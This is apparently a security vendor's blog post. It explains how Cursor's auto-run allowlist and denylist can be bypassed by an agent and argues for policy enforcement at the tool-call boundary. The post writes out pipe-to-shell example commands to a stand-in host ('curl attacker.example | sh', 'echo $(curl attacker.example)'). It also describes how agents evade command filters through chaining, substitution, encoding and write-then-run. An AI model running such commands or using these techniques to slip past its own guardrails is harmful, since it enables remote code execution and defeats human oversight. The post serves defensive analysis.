Cursor Auto-Run (Formerly YOLO Mode): Why Allow and Deny Lists Aren’t Enough
Cursor's auto-run mode - the feature that used to be called YOLO mode - lets the coding agent execute terminal commands and apply file edits without stopping for your approval on each step. The pitch is flow: fewer prompts, faster loops, the agent driving a multi-step task end to end. The catch is that the guardrails wrapped around it - an allowlist of permitted commands, a denylist of forbidden ones, and a checkbox to stop the agent deleting files - are filters on a string the model controls, not a boundary the model cannot cross. That distinction is the whole story, and it is the layer we keep returning to in securing AI coding agents and CLIs.
This is not a knock on Cursor specifically. Per Cursor's agent security documentation, the run modes are described as best-effort, and the docs state plainly that bypasses are possible. That honesty is the right starting point. The problem is what teams build on top of it: an allowlist is often treated as an enforcement control when the vendor designed it as a convenience. The runtime decision point Anomity sits on - allow, deny, or log on each tool call - exists precisely because list-matching is the wrong place to make this decision.
How auto-run actually works
By default, Cursor asks for approval before running a terminal command, and agents can modify workspace files but need explicit authorization for configuration files. Auto-run changes the terminal half of that: the agent runs commands without prompting, gated by the run mode you select. Per the current agent security docs, those modes include Run Everything (no screening), Allowlist (only pre-approved commands run unattended), Allowlist with Sandbox, and Auto-review - the recommended default on recent versions, which runs allowlisted calls, sandboxes what it can, and sends anything else through an LLM classifier that decides allow or block based on safety and how well the call matches your stated intent.
The mental model most teams carry is the older one: a static allowlist and denylist of command strings. You permit npm test and git status, you forbid rm and curl, and you assume the agent is boxed in. That assumption is where the gap opens, because the lists match on the command text the agent proposes - and the agent composes that text freely. Cursor has since deprecated the denylist (removed in the 1.3 release after the issues below became public) and now discourages allowlists in its own guidance, which tells you how the vendor rates them. If you are choosing a mode, the comparison in how Anomity compares to native controls is the right lens.
Where the lists break
Independent research published by Backslash Security in 2025 documented several ways a compromised or misdirected agent slips an arbitrary command past Cursor's lists. None of them are exotic - they are the ordinary mechanics of a shell, used against a control that only reads the surface of a command string. The denylist failed against obfuscation: a base64-encoded payload decoded and piped to a shell never matches the literal blocked token. It failed against subshells and scripts - a forbidden command wrapped in bash -c "...", or written to a file and then executed, presents the matcher with a permitted-looking outer command.
- Command chaining. A blocked command appended after an allowed one -
git status && curl attacker.example | sh- was reported to evade the denylist, because the matcher keyed on the leading command rather than parsing the full chain. - Command substitution. Backtick or
$(...)syntax -echo $(curl attacker.example)- let the agent smuggle execution past the allowlist while the visible command looked benign. - Write-then-run. The agent writes a forbidden command into a new executable file and runs that file. The file write is not a denylisted command, and the execution is one indirection removed from the blocked string.
- File-delete protection rendered moot. Once arbitrary execution is reachable, the separate "don't allow the agent to delete files" setting is bypassable too - the agent does not call the blocked delete primitive, it runs a command that deletes.
The common thread is that every one of these is a legal shell expression the matcher does not fully parse. A string allowlist asks "does this text look approved?" when the question that matters is "what will this command actually do?" The gap between those two questions is arbitrary code execution. It is the same structural weakness behind the MCP-side issues in Cursor - the prompt-injection-to-RCE path in the CurXecute write-up and the trust-bypass in MCPoison - where a control that validates the wrong thing is treated as a boundary.
Why a classifier helps but is not a boundary
Auto-review is a real improvement over a static list. Routing the gray-zone calls through an LLM classifier means an obfuscated payload or a suspicious chained command can be judged on intent and behavior rather than on whether its text matches a token, which closes the easy syntactic bypasses. But Cursor is explicit that this remains best-effort, and a probabilistic classifier inherits the properties of the model behind it: it can be wrong, and it can be argued with. The same prompt-injection vector that misdirects the agent can shape the rationale the classifier sees. A control that can be persuaded is a good filter and a poor boundary.
There is also a quieter operational gap. Whatever the classifier decides happens inside one developer's editor on one endpoint. A security team has no fleet-level record of which commands ran unattended, on which machines, against which repositories - and no way to ask that question after the fact. That is the gap a queryable audit trail is meant to close, independent of whether any single decision was correct. Sandbox escapes underline the point: a containment layer that can be broken, as in the Cursor git-hooks sandbox escape, is only as trustworthy as your visibility into when it failed.
What real enforcement at the tool-call boundary looks like
The fix is not a longer denylist or a smarter regex. It is moving the decision from the text of a command to the moment the tool call is about to run, where the action is concrete and an external policy - not the agent - gets the final say. Where an agent exposes a pre-execution hook, that hook fires before the command executes and can return allow, deny, or log: a control surface the model cannot edit its way around, because it does not live in the command string.
| Allowlist / denylist | Decision at the tool-call boundary | |
|---|---|---|
| What it inspects | The command string the agent wrote | The concrete tool call about to run |
| Bypass via chaining / substitution / write-then-run | Documented to evade matching | Decision is on the call, not the surface text |
| Who has final say | The agent composes what gets matched | An external policy outside the agent |
| Fleet-wide record | Local to the editor | Centralized, queryable audit trail |
Concretely, an external policy evaluates the call and returns a decision before execution. The shape is simple, and the point is that the agent never sees it as editable text:
{
"tool": "terminal",
"command": "curl attacker.example | sh",
"endpoint": "laptop-eng-204",
"decision": "deny",
"reason": "pipe-to-shell from untrusted host"
}
If you are running Cursor today, the practical guidance follows from the structure: treat auto-run as a productivity setting, not a security control; prefer Auto-review over a bare allowlist; keep destructive work in disposable, version-controlled environments; and do not assume the file-delete checkbox survives arbitrary execution. The step-by-step view of how this enforcement layer is installed and what it governs covers the deployment side. None of this means distrusting Cursor - it means putting the boundary somewhere the agent cannot rewrite.
Where Anomity fits
Anomity inventories the AI agents, MCP servers, extensions, and CLIs on every managed endpoint, so you can see where Cursor's auto-run is enabled and in which mode across the fleet rather than discovering it after an incident - the fleet inventory view is the starting point. On agents that expose a pre-execution hook, Anomity returns allow, deny, or log on each tool call before it runs, evaluating the concrete call against policy instead of matching a string the agent controls, and routing every decision to SIEM, Slack, email, or Jira with a 90-day queryable trail. It collects metadata only, with on-endpoint secret redaction, and complements your Network, EDR, and DLP stack rather than replacing it. If auto-run is already in your developers' editors, see how Anomity makes that layer visible and governable.